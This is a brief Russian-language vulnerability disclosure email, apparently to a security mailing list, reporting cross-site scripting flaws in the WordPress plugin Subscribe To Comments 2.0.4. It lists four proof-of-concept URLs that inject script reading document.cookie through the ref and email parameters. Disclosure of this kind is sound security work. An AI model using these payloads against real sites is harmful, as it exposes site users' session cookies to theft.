Здравствуйте 3APA3A!
Сообщаю вам о найденной мною 14.09.2006 нескольких Cross-Site Scripting
уязвимостей в Subscribe To Comments 2.0.4 - популярном плагине к WordPress.
Уязвимость имеется в параметрах ref и email в скриптах
wp-subscription-manager.php та subscribe-to-comments.php.
XSS:
http://host/blog_path/wp-subscription-manager.php?ref=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://host/blog_path/wp-admin/edit.php?page=subscribe-to-comments.php&ref=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://host/blog_path/wp-subscription-manager.php?email=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://host/blog_path/wp-admin/edit.php?page=subscribe-to-comments.php&email=%3Cscript%3Ealert(document.cookie)%3C/script%3E
Дополнительная информация о данной уязвимости у меня на сайте:
http://websecurity.com.ua/187/
Я уже сообщил об уязвимости разработчикам плагина и разработчикам WordPress.
Разработчик плагина в данный момент уже работает над обновленной версией
плагина (с исправлением указанных мною уязвимостей).
Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua